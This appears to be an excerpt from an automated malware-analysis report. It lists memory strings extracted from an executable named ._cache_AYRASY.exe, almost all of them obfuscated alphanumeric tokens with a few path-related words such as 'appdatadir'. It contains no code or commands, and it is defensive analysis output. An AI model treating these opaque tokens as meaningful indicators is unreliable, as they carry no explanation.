                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o7eg9pv6em4amemstr_a02ffd20-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q4ia2ok9ii4amemstr_8f2a9531-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t2ky9la2lleftmemstr_905d9c81-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8kg8my1kmemstr_21180537-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1884050258smemstr_62173e6e-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0aoxmemstr_996fbbc8-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8kg8my1khxmemstr_d3a935db-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8kg8my1kexmemstr_447be1c7-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t4np7lz8iu9f~xmemstr_bcee140c-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7m{xmemstr_b9c36717-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0atxmemstr_45f4ae70-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w7mqxmemstr_f95269ca-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q4ia2ok9ii4ajxmemstr_c01e1346-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t9pb8qu1c8sgxmemstr_22d49491-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t9pb8qu1cleft@xmemstr_3dfb4012-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n8hz1cv2z]xmemstr_9550889a-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8kg8my1k4avxmemstr_ddb7aa57-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hsxmemstr_04b271d2-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z2nq4ft7qw0z)xmemstr_881aa334-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5h"xmemstr_798f461c-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7m?xmemstr_38beb0b0-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7m8xmemstr_631fc562-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u4tv9td1w0z5xmemstr_cffc7767-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u4tv9td1w0ztmemstr_b7d699f4-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u4tv9td1wmemstr_2d835d98-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v7xl4dd6i4shtmemstr_dc5b22b4-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w4smemstr_429ba393-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l5me8ge5imemstr_62c571c4-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q0cx6ts5pi4smemstr_569506e5-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q4th3hp0a0zmemstr_3e228cb4-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8shtmemstr_dc2d730c-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9nf5wu2gh6wmemstr_18fd9264-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a5hmemstr_370b3e9b-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w8stmemstr_5d1ac45d-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q0cx6ts5pi4stmemstr_91f2c7db-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q4th3hp0a8smemstr_6f5a88f2-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n2xx6fr2hnwmemstr_3d7cb544-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mdwmemstr_28e9c0d4-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0aawmemstr_e2e3b946-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u4tv9td1wzwmemstr_e6772b9f-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hwwmemstr_64d301b9-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2wpwmemstr_044147e6-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z2nq4ft7qw0zmwmemstr_a5a478db-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hfwmemstr_e4222a0b-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mcwmemstr_2c4b70fe-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6xh2sc8s\wmemstr_d5c9cf1f-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t0sa3lz2dywmemstr_9fa18427-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7m/wmemstr_b8d4548e-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z2nq4ft7qw0z>wmemstr_02b3239f-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n2xx6fr2h;wmemstr_44fe3b33-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z2nq4ft7qw0z4wmemstr_54b465b7-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n2xx6fr2hright1wmemstr_d8e51342-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w7mhtwmemstr_8aba6fed-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w0zmemstr_ef4fea9a-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m4au8wu2ub8umemstr_2ad6ce6a-b
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g8co3jy8iy2rmemstr_77c36344-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n6co9mm7gmemstr_a68303af-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f6du1ht0ez1ymemstr_7ac2d897-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p9fw1cq6d8u`vmemstr_376fd43c-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8ssvmemstr_4ca1403e-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l3cy5rl7mu9tivmemstr_db0952f4-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m4au8wu2ub8ubvmemstr_64d43ee7-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4rs9cc4y_vmemstr_2fddaf82-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0axvmemstr_341c32b2-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8s.vmemstr_bb813403-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e0yu4to4m+vmemstr_c4810305-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u8eo4bx8x$vmemstr_9cc14107-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5h!vmemstr_3983cbcb-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w7m:vmemstr_3ed56922-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: userprofiledir7vmemstr_6bb7e514-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q8dx2ru2i0vmemstr_7cab81bf-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v7qr1zj0ymemstr_3d66846d-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q8dx2ru2imemstr_03410820-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w4amemstr_8caf21d4-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0amumemstr_ad388741-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5h|umemstr_fd8c1012-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o7eg9pv6em4ayumemstr_cb9bf18a-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mrumemstr_2e3060e1-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0aoumemstr_726a3a6a-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdatadirhumemstr_7be7b0cf-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w^umemstr_e7ee2012-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8s[umemstr_7b9015a0-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mqumemstr_73a90f44-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o7eg9pv6em4a*umemstr_00ed6137-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w'umemstr_09539706-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a8s umemstr_e3378ea6-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7m6umemstr_285debd4-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5h3umemstr_3fc706be-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mumemstr_dd34b7e6-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l5me8ge5ileftmemstr_75b190c7-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q4th3hp0a4shtmemstr_9a88a35e-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n8hz1cv2zmemstr_788bdc5a-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t9pb8qu1c8smemstr_0f275be0-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 188405025memstr_d82d6fa2-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t9pb8qu1cleftmemstr_13f890a3-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t4np7lz8iu9fmemstr_b2c78c93-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m8kg8my1kltmemstr_30ab8d88-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hitmemstr_2737bacb-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0abtmemstr_e56b96d2-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bo6ji7js7dhtmemstr_bca7353a-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0aleftxtmemstr_7fc238a4-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mutmemstr_b1b872e5-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q0cx6ts5pi4sntmemstr_34b2625b-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q0cx6ts5pi4sktmemstr_b06fecb3-8
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v7xl4dd6itdtmemstr_26e0164f-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8satmemstr_d01a4962-a
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mztmemstr_f5f0d166-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hwtmemstr_96872fe2-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8sptmemstr_bb3d89d8-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w5h-tmemstr_6c37a62d-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5h&tmemstr_77d17489-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q0cx6ts5pi4s#tmemstr_ddd87680-7
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bo6ji7js7d<tmemstr_940c3d1a-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q4th3hp0a8s9tmemstr_05536c6f-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9nf5wu2gh6w2tmemstr_5e10c019-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v7qr1zj0y7dmemstr_45207b5e-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w5hmemstr_42e7a763-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hosmemstr_5c4fe480-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2whsmemstr_3f243921-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mesmemstr_7e2054db-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8s~smemstr_75a214ec-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7m{smemstr_0e1f83e5-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8stsmemstr_f31012cd-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0aqsmemstr_09926f77-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w5nu7fc9gz7mjsmemstr_18bb1346-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6xh2sc8sgsmemstr_598bc549-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u9gp8ha2w7m@smemstr_47c169c0-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bo6ji7js7d]smemstr_97c19313-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y0nh9tt7ou5hvsmemstr_4c81e133-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n0bb6xh2sc8sssmemstr_781c7de3-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v0jp1hr0a8s,smemstr_7798d22f-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3r)smemstr_4a793f95-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b0e?smemstr_de317263-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0sk9xh8ez0e8smemstr_407d091b-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3rmemstr_197b2739-f
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b0ememstr_326d50aa-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1bmemstr_f39ea10b-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0sk9xh8ez0ememstr_1f4ac397-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: existsrmemstr_02895346-4
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x4nk4rj5v8smemstr_439d143f-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b7lmemstr_103cef8a-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r2xh3yp1ob7lmemstr_b3ea31c8-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6gmemstr_a14a979d-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b6gmemstr_3c455601-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b6gnrmemstr_6ca83cc5-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6gkrmemstr_6dd9f404-e
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b6gdrmemstr_66add8ef-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3rarmemstr_79ab1471-1
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c7zr3rzrmemstr_81b2db25-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3rwrmemstr_4e8274f1-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: witchprmemstr_ce84b3b5-d
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3rcrmemstr_518979b1-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k4ha7yg1wr6gyrmemstr_0f2ed0b6-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c6mr6dc7zr3r(rmemstr_07c34925-5
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b%rmemstr_9d6a8418-3
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b4rmemstr_d7dc1b2b-c
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p6om9pl1b1rmemstr_79ed27c9-2
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6dc7zr3rmemstr_48ce6fc0-0
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r7qk0sf0amemstr_728ebaf9-9
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1wl4kx8zv2kmemstr_afed2965-6
                                Source: ._cache_AYRASY.exe, 00000002.00000002.3414885254.000000000179C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u3xq5wq2ea3mmemstr_4a2b7c12-9
